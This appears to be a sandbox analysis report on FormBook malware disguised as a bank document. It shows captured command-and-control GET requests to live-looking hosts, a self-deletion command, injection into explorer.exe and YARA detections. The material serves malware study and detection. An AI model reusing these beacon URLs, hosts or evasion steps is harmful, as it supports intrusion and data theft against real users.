                                                                                                                                                                                                      Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c
                                                                                                                                                                                                      Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;al
                                                                                                                                                                                                      May 19, 2022 14:10:44.670892954 CEST9775INData Raw: 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72 65 6d 7d 2e 61 63 74 69 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 41 39 41 39 41 39 3b 70 61 64 64 69 6e 67 3a 31 2e 32 72
                                                                                                                                                                                                      Data Ascii: ign-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{borde
                                                                                                                                                                                                      May 19, 2022 14:10:44.670909882 CEST9777INData Raw: 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69 73 6f 20 70 61 72 61 20 61 63 63 65 64 65 72 20 61 20 65 73 74 61 20 70 c3 a1 67 69 6e 61 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 6b 6f 22 3a
                                                                                                                                                                                                      Data Ascii: "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": " " }, "da": { "title": "
                                                                                                                                                                                                      May 19, 2022 14:10:44.670927048 CEST9778INData Raw: 86 e0 a4 aa e0 a4 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0 a4 87 e0 a4 9f 20 e0 a4 a4 e0 a4 95 20 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 aa e0 a5 8d e0 a4 b0 e0 a4 be e0 a4 aa e0 a5 8d e0
                                                                                                                                                                                                      Data Ascii: " }, "ja": { "title": "", "content-title": "
                                                                                                                                                                                                      May 19, 2022 14:10:44.670941114 CEST9778INData Raw: 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 5b 64 61 74 61 2d 69 31 38 6e 3d 22 20 2b 20 69 64 20 2b 20 22 5d 22 29 3b 0a 20 20
                                                                                                                                                                                                      Data Ascii: translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage document.title = translations["title"]; // Replace
                                                                                                                                                                                                      May 19, 2022 14:10:44.670953989 CEST9778INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                      3192.168.2.349818162.241.253.23180C:\Windows\explorer.exe
                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                      May 19, 2022 14:10:49.939589024 CEST10155OUTGET /arh2/?5j1TIdG=sfi/U9uziz3yd+cIlnupVfxmGYoGEUQ+cvnH9JBY/zXkxzDvMNHWuq6jibpyEsrEd8HV&ozr=4hLlIp3xzfzHD HTTP/1.1
                                                                                                                                                                                                      Host: www.paulstilingroup.com
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                      May 19, 2022 14:10:50.098887920 CEST10156INHTTP/1.1 404 Not Found
                                                                                                                                                                                                      Date: Thu, 19 May 2022 12:10:50 GMT
                                                                                                                                                                                                      Server: Apache
                                                                                                                                                                                                      Content-Length: 315
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                      4192.168.2.349827171.22.26.1380C:\Windows\explorer.exe
                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                      May 19, 2022 14:10:55.300599098 CEST10540OUTGET /arh2/?5j1TIdG=AqsknWRV/riizoNmVvG7FCz2heUwdGJDo97IkGz+WM+jgCd41u4hQz4X6wFdUq/gZt5o&ozr=4hLlIp3xzfzHD HTTP/1.1
                                                                                                                                                                                                      Host: www.ponponshoes.com
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                      May 19, 2022 14:10:57.439950943 CEST10640INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      X-Powered-By: PHP/7.4.11
                                                                                                                                                                                                      Set-Cookie: digits_countrycode=98; expires=Sun, 22-May-2022 12:10:57 GMT; Max-Age=259200; path=/; SameSite=None
                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                      X-Redirect-By: WordPress
                                                                                                                                                                                                      Location: http://ponponshoes.com/arh2/?5j1TIdG=AqsknWRV/riizoNmVvG7FCz2heUwdGJDo97IkGz+WM+jgCd41u4hQz4X6wFdUq/gZt5o&ozr=4hLlIp3xzfzHD
                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                      Date: Thu, 19 May 2022 12:10:57 GMT
                                                                                                                                                                                                      Server: LiteSpeed
                                                                                                                                                                                                      Vary: User-Agent


                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                      Start time:14:08:57
                                                                                                                                                                                                      Start date:19/05/2022
                                                                                                                                                                                                      Path:C:\Users\user\Desktop\Document de bancobpi_66473474.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Document de bancobpi_66473474.exe"
                                                                                                                                                                                                      Imagebase:0x220000
                                                                                                                                                                                                      File size:3044864 bytes
                                                                                                                                                                                                      MD5 hash:5888637A68B3B9148ECCA46CAD771D0A
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.314192063.0000000003BB5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.314192063.0000000003BB5000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.314192063.0000000003BB5000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.316963754.00000000046E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.316963754.00000000046E7000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.316963754.00000000046E7000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.314362271.0000000003C54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.314362271.0000000003C54000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.314362271.0000000003C54000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.315114099.0000000004549000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.315114099.0000000004549000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                      Start time:14:09:09
                                                                                                                                                                                                      Start date:19/05/2022
                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\setup16.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\setup16.exe
                                                                                                                                                                                                      Imagebase:0x11e0000
                                                                                                                                                                                                      File size:26624 bytes
                                                                                                                                                                                                      MD5 hash:1BF408509BDFB41967FEA0EB1493786B
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.299122182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.299122182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.299122182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.369940835.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.369940835.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.369940835.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.369893076.00000000007B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.369893076.00000000007B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.369893076.00000000007B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.297403111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.297403111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.297403111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.298419398.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.298419398.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.298419398.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                      Start time:14:09:15
                                                                                                                                                                                                      Start date:19/05/2022
                                                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                      Imagebase:0x7ff6b8cf0000
                                                                                                                                                                                                      File size:3933184 bytes
                                                                                                                                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.338228196.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.338228196.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.338228196.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.357277417.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.357277417.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.357277417.000000000D15C000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                      Start time:14:09:41
                                                                                                                                                                                                      Start date:19/05/2022
                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                      Imagebase:0x1030000
                                                                                                                                                                                                      File size:59904 bytes
                                                                                                                                                                                                      MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.538534046.0000000003270000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.538534046.0000000003270000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.538534046.0000000003270000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.538727170.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.538727170.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.538727170.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.537874239.0000000000E70000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                      Start time:14:09:45
                                                                                                                                                                                                      Start date:19/05/2022
                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                      Commandline:/c del "C:\Windows\SysWOW64\setup16.exe"
                                                                                                                                                                                                      Imagebase:0xc20000
                                                                                                                                                                                                      File size:232960 bytes
                                                                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:18
                                                                                                                                                                                                      Start time:14:09:46
                                                                                                                                                                                                      Start date:19/05/2022
                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      Imagebase:0x7ff7c9170000
                                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:19.4%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                        Signature Coverage:78.6%
                                                                                                                                                                                                        Total number of Nodes:14
                                                                                                                                                                                                        Total number of Limit Nodes:0
                                                                                                                                                                                                        execution_graph 11526 11d0870 11527 11d088a 11526->11527 11538 11d02e0 11527->11538 11529 11d0891 11530 11d02e0 LoadLibraryA 11529->11530 11531 11d08bd 11530->11531 11534 11d0ec8 VirtualProtect 11531->11534 11535 11d0ed0 VirtualProtect 11531->11535 11532 11d093c 11536 11d0ec8 VirtualProtect 11532->11536 11537 11d0ed0 VirtualProtect 11532->11537 11533 11d0981 11534->11532 11535->11532 11536->11533 11537->11533 11541 11d0be8 LoadLibraryA 11538->11541 11540 11d0ce9 11541->11540

                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                        Function 011DC618 Relevance: 1.8, Strings: 1, Instructions: 532COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 705 11dc618-11dc62a 865 11dc62c call 11dcb4f 705->865 866 11dc62c call 11dc618 705->866 867 11dc62c call 11dc608 705->867 706 11dc632-11dc64c 708 11dc64e-11dc657 706->708 709 11dc65a-11dc66d 706->709 708->709 710 11dc8dd-11dc8e1 709->710 711 11dc673-11dc676 709->711 712 11dc8f6 710->712 713 11dc8e3-11dc8f3 710->713 714 11dc678-11dc67d 711->714 715 11dc685-11dc691 711->715 719 11dc8f7-11dc900 712->719 713->712 714->715 717 11dc91b-11dc92c 715->717 718 11dc697-11dc6a9 715->718 717->719 725 11dc92e-11dc961 717->725 723 11dc6af-11dc702 718->723 724 11dc815-11dc823 718->724 755 11dc704-11dc710 call 11dc350 723->755 756 11dc712 723->756 731 11dc829-11dc837 724->731 732 11dc8a8-11dc8aa 724->732 729 11dc970-11dc998 725->729 730 11dc963-11dc96d 725->730 752 11dcaed-11dcb0b 729->752 753 11dc99e-11dc9b7 729->753 730->729 733 11dc839-11dc83e 731->733 734 11dc846-11dc852 731->734 735 11dc8ac-11dc8b2 732->735 736 11dc8b8-11dc8c4 732->736 733->734 734->717 742 11dc858-11dc887 734->742 740 11dc8b4 735->740 741 11dc8b6 735->741 747 11dc8c6-11dc8d7 736->747 740->736 741->736 757 11dc889-11dc896 742->757 758 11dc898-11dc8a6 742->758 747->710 747->711 773 11dcb0d-11dcb2f 752->773 774 11dcb76-11dcb80 752->774 769 11dc9bd-11dc9d3 753->769 770 11dcace-11dcae7 753->770 760 11dc714-11dc724 755->760 756->760 757->758 758->710 771 11dc73f-11dc741 760->771 772 11dc726-11dc73d 760->772 769->770 795 11dc9d9-11dca27 769->795 770->752 770->753 775 11dc78a-11dc78c 771->775 776 11dc743-11dc751 771->776 772->771 791 11dcb81-11dcbd2 call 11d7fb8 773->791 792 11dcb31-11dcb40 773->792 780 11dc78e-11dc798 775->780 781 11dc79a-11dc7aa 775->781 776->775 785 11dc753-11dc765 776->785 780->781 796 11dc7e3-11dc7ef 780->796 793 11dc7ac-11dc7ba 781->793 794 11dc7d5-11dc7d8 781->794 800 11dc76b-11dc76f 785->800 801 11dc767-11dc769 785->801 830 11dcbd4-11dcbf0 call 11d7a60 791->830 831 11dcbf2-11dcc30 call 11d6cf8 * 3 791->831 798 11dcb47-11dcb4d 